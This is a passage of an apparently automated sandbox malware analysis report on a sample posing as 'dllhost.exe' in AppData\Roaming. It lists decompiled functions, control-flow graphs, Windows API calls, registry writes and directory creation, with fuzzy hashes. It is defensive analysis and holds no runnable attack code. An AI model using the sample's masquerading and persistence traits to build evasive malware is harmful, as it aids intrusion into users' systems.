                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                              • String ID: Completed
                                                                              • API String ID: 2531174081-3087654605
                                                                              • Opcode ID: 59d154118c10e025c7735e233b98b544c2589afa460e0b5fca85982ca0aab28e
                                                                              • Instruction ID: a4acd4142143b7f1d9b449385db23515f6e2bed73a3e7c1e364118513a645948
                                                                              • Opcode Fuzzy Hash: 59d154118c10e025c7735e233b98b544c2589afa460e0b5fca85982ca0aab28e
                                                                              • Instruction Fuzzy Hash: 09216071900518BACB21AF66DD84DDFBF74EF45350F14807AF944B62A0C7794A51CF68
                                                                              Function 004065B6 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 576 4065b6-4065d6 GetSystemDirectoryW 577 4065d8 576->577 578 4065da-4065dc 576->578 577->578 579 4065ed-4065ef 578->579 580 4065de-4065e7 578->580 582 4065f0-406623 wsprintfW LoadLibraryExW 579->582 580->579 581 4065e9-4065eb 580->581 581->582
                                                                              APIs
                                                                              • GetSystemDirectoryW.KERNEL32(?,00000104,UXTHEME), ref: 004065CD
                                                                              • wsprintfW.USER32 ref: 00406608
                                                                              • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 0040661C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                              • String ID: %s%S.dll$UXTHEME$\
                                                                              • API String ID: 2200240437-1946221925
                                                                              • Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                              • Instruction ID: f2f916ca2f11fba704df1b43a3ace0cea71321b702594bff0db05fa861777559
                                                                              • Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                              • Instruction Fuzzy Hash: F9F0F670500219BBCF24AB68ED0DF9B3B6CAB00704F50447AA646F10D1EB78DA24CBA8
                                                                              Function 004030FA Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 583 4030fa-403111 584 403113 583->584 585 40311a-403122 583->585 584->585 586 403124 585->586 587 403129-40312e 585->587 586->587 588 403130-403139 call 4032f5 587->588 589 40313e-40314b call 4032df 587->589 588->589 593 403151-403155 589->593 594 403296 589->594 596 40315b-40317b GetTickCount call 406787 593->596 597 40327f-403281 593->597 595 403298-403299 594->595 599 4032d8-4032dc 595->599 607 4032d5 596->607 609 403181-403189 596->609 600 403283-403286 597->600 601 4032ca-4032ce 597->601 602 403288 600->602 603 40328b-403294 call 4032df 600->603 604 4032d0 601->604 605 40329b-4032a1 601->605 602->603 603->594 616 4032d2 603->616 604->607 610 4032a3 605->610 611 4032a6-4032b4 call 4032df 605->611 607->599 613 40318b 609->613 614 40318e-40319c call 4032df 609->614 610->611 611->594 620 4032b6-4032c2 call 405df0 611->620 613->614 614->594 621 4031a2-4031ab 614->621 616->607 626 4032c4-4032c7 620->626 627 40327b-40327d 620->627 623 4031b1-4031c4 call 4067a7 621->623 628 4031c9-4031ce 623->628 626->601 627->595 629 4031d4-4031eb GetTickCount 628->629 630 403277-403279 628->630 631 403236-403238 629->631 632 4031ed-4031f5 629->632 630->595 633 40323a-40323e 631->633 634 40326b-40326f 631->634 635 4031f7-4031fb 632->635 636 4031fd-403233 MulDiv wsprintfW call 4052b0 632->636 637 403240-40324c call 405df0 633->637 638 403253-403259 633->638 634->609 639 403275 634->639 635->631 635->636 636->631 637->627 646 40324e-403251 637->646 643 40325f-403263 638->643 639->607 643->623 645 403269 643->645 645->607 646->643
                                                                              APIs
                                                                              • GetTickCount.KERNEL32(?,00000004,00000000,00000000,00000000), ref: 0040315B
                                                                              • GetTickCount.KERNEL32(0040CEA0,00004000), ref: 004031DC
                                                                              • MulDiv.KERNEL32 ref: 00403209
                                                                              • wsprintfW.USER32 ref: 0040321C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: CountTick$wsprintf
                                                                              • String ID: ... %d%%
                                                                              • API String ID: 551687249-2449383134
                                                                              • Opcode ID: 52136a46cc721e38218c1625eaa21fc4b877046288e446531aa411092f1c675d
                                                                              • Instruction ID: 2f3e22fda6cf622f8bf4b8160786ddb998526db62ce5623fe0a3028d3f0862ac
                                                                              • Opcode Fuzzy Hash: 52136a46cc721e38218c1625eaa21fc4b877046288e446531aa411092f1c675d
                                                                              • Instruction Fuzzy Hash: A3517171900219EBCB10DF65DA48B9F3B68AF45366F1441BFF805B72C0D7789E508BA9
                                                                              Function 0040577F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 647 40577f-4057ca CreateDirectoryW 648 4057d0-4057dd GetLastError 647->648 649 4057cc-4057ce 647->649 650 4057f7-4057f9 648->650 651 4057df-4057f3 SetFileSecurityW 648->651 649->650 651->649 652 4057f5 GetLastError 651->652 652->650
                                                                              APIs
                                                                              • CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057C2
                                                                              • GetLastError.KERNEL32 ref: 004057D6
                                                                              • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004057EB
                                                                              • GetLastError.KERNEL32 ref: 004057F5
                                                                              Strings
                                                                              • C:\Users\user\AppData\Roaming, xrefs: 0040577F
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                              • String ID: C:\Users\user\AppData\Roaming
                                                                              • API String ID: 3449924974-2707566632
                                                                              • Opcode ID: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                                              • Instruction ID: a96db4d766433405fa600e453148f039d13b259e3fca1cfbe784ddd29ae139cf
                                                                              • Opcode Fuzzy Hash: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                                              • Instruction Fuzzy Hash: 52010871C10619DADF01DFA4CD44BEFBBB8EB14355F00407AD545B6281E7789608DFA9
                                                                              Function 00405D6D Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 653 405d6d-405d79 654 405d7a-405dae GetTickCount GetTempFileNameW 653->654 655 405db0-405db2 654->655 656 405dbd-405dbf 654->656 655->654 657 405db4 655->657 658 405db7-405dba 656->658 657->658
                                                                              APIs
                                                                              • GetTickCount.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,?,"C:\Users\user\AppData\Roaming\dllhost.exe" ,0040333B,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,7570D4C4,00403589,?,00000006), ref: 00405D8B
                                                                              • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\AppData\Roaming\dllhost.exe" ,0040333B,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,7570D4C4,00403589), ref: 00405DA6
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: CountFileNameTempTick
                                                                              • String ID: "C:\Users\user\AppData\Roaming\dllhost.exe" $C:\Users\user\AppData\Local\Temp\$nsa
                                                                              • API String ID: 1716503409-338990885
                                                                              • Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                              • Instruction ID: 85bdb6a116c51bdc328f0f27a7d8b9c38e3c9c6247ffb38d9ffcafb3e867c1bf
                                                                              • Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                              • Instruction Fuzzy Hash: D2F03076601704FBEB009F69ED09F9FB7ADEF95710F10803BE901E7250E6B0A9548B64
                                                                              Function 00401C19 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 659 401c19-401c39 call 402c15 * 2 664 401c45-401c49 659->664 665 401c3b-401c42 call 402c37 659->665 667 401c55-401c5b 664->667 668 401c4b-401c52 call 402c37 664->668 665->664 671 401ca9-401cd3 call 402c37 * 2 FindWindowExW 667->671 672 401c5d-401c79 call 402c15 * 2 667->672 668->667 684 401cd9 671->684 682 401c99-401ca7 SendMessageW 672->682 683 401c7b-401c97 SendMessageTimeoutW 672->683 682->684 685 401cdc-401cdf 683->685 684->685 686 401ce5 685->686 687 402abf-402ace 685->687 686->687
                                                                              APIs
                                                                              • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C89
                                                                              • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Timeout
                                                                              • String ID: !
                                                                              • API String ID: 1777923405-2657877971
                                                                              • Opcode ID: 52c69b6bb6857bf2a270f80e5499bbb17c10517d475e12f2cc1f17fbea43ed8a
                                                                              • Instruction ID: 29033229b0686faa5c7805d11c7179544b5b5cf9f353c3a0c808591dcba6bfc2
                                                                              • Opcode Fuzzy Hash: 52c69b6bb6857bf2a270f80e5499bbb17c10517d475e12f2cc1f17fbea43ed8a
                                                                              • Instruction Fuzzy Hash: 1521C171948209AEEF05AFA5CE4AABE7BB4EF84308F14443EF502B61D1D7B84541DB28
                                                                              Function 004023DE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 690 4023de-40240f call 402c37 * 2 call 402cc7 697 402415-40241f 690->697 698 402abf-402ace 690->698 700 402421-40242e call 402c37 lstrlenW 697->700 701 402432-402435 697->701 700->701 702 402437-402448 call 402c15 701->702 703 402449-40244c 701->703 702->703 707 40245d-402471 RegSetValueExW 703->707 708 40244e-402458 call 4030fa 703->708 712 402473 707->712 713 402476-402557 RegCloseKey 707->713 708->707 712->713 713->698 715 402885-40288c 713->715 715->698
                                                                              APIs
                                                                              • lstrlenW.KERNEL32(sarcoderma,00000023,00000011,00000002), ref: 00402429
                                                                              • RegSetValueExW.KERNEL32 ref: 00402469
                                                                              • RegCloseKey.KERNEL32(?), ref: 00402551
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: CloseValuelstrlen
                                                                              • String ID: sarcoderma
                                                                              • API String ID: 2655323295-3317469366
                                                                              • Opcode ID: 5b41d600a9c01ed503e2f7d7031b514b7e0553d86e83f8d8ce72929142521f87
                                                                              • Instruction ID: f6ab6de36865f89e990f87fcf60bb758a602a58abc301ab7ae12c482c30fe319
                                                                              • Opcode Fuzzy Hash: 5b41d600a9c01ed503e2f7d7031b514b7e0553d86e83f8d8ce72929142521f87
                                                                              • Instruction Fuzzy Hash: 7C118171E00108BEEB10AFA5DE49EAEBAB8EB54354F11803AF505F71D1DBB84D419B58
                                                                              Function 00402D2A Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 716 402d2a-402d53 call 4060b9 718 402d58-402d5a 716->718 719 402dd0-402dd4 718->719 720 402d5c-402d62 718->720 721 402d7e-402d93 RegEnumKeyW 720->721 722 402d64-402d66 721->722 723 402d95-402da7 RegCloseKey call 406626 721->723 724 402db6-402dc2 RegCloseKey 722->724 725 402d68-402d7c call 402d2a 722->725 730 402dc4-402dca RegDeleteKeyW 723->730 731 402da9-402db4 723->731 724->719 725->721 725->723 730->719 731->719
                                                                              APIs
                                                                              • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402D8F
                                                                              • RegCloseKey.ADVAPI32(?), ref: 00402D98
                                                                              • RegCloseKey.ADVAPI32(?), ref: 00402DB9
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: Close$Enum
                                                                              • String ID:
                                                                              • API String ID: 464197530-0
                                                                              • Opcode ID: 820009e43a9071b4c2fbcc767f02e7592704dcbe5a8c35a15d570ca0c02c344c
                                                                              • Instruction ID: 57c196990662b4067a631aae43276665adbe806e29497986ae1bc13e9df6c193
                                                                              • Opcode Fuzzy Hash: 820009e43a9071b4c2fbcc767f02e7592704dcbe5a8c35a15d570ca0c02c344c
                                                                              • Instruction Fuzzy Hash: 4C115832540509FBDF129F90CE09BAE7B69AF58340F110076B905B50E0E7B59E21AB68
                                                                              Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00405BC8: CharNextW.USER32(?), ref: 00405BD6
                                                                                • Part of subcall function 00405BC8: CharNextW.USER32(00000000), ref: 00405BDB
                                                                                • Part of subcall function 00405BC8: CharNextW.USER32(00000000), ref: 00405BF3
                                                                              • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                                • Part of subcall function 0040577F: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 004057C2
                                                                              • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea,?,00000000,000000F0), ref: 0040164D
                                                                              Strings
                                                                              • C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea, xrefs: 00401640
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                              • String ID: C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea
                                                                              • API String ID: 1892508949-1965738620
                                                                              • Opcode ID: 6b082716cab5125e7c79c4872f4bf42b9c22a4353e5c2ec3a4e4a36325993921
                                                                              • Instruction ID: cf923580388ec08c1514b784e2bf170a85d63446f7292b2ca235e8bc108e1b76
                                                                              • Opcode Fuzzy Hash: 6b082716cab5125e7c79c4872f4bf42b9c22a4353e5c2ec3a4e4a36325993921
                                                                              • Instruction Fuzzy Hash: 2E11BE31504105EBCF31AFA4CD0199F36A0EF15368B28493BFA45B22F2DA3E4D519B5E
                                                                              Function 0040611A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RegQueryValueExW.KERNEL32(?,?,00000000,00000000,?,00000800), ref: 00406160
                                                                              • RegCloseKey.KERNEL32(?), ref: 0040616B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
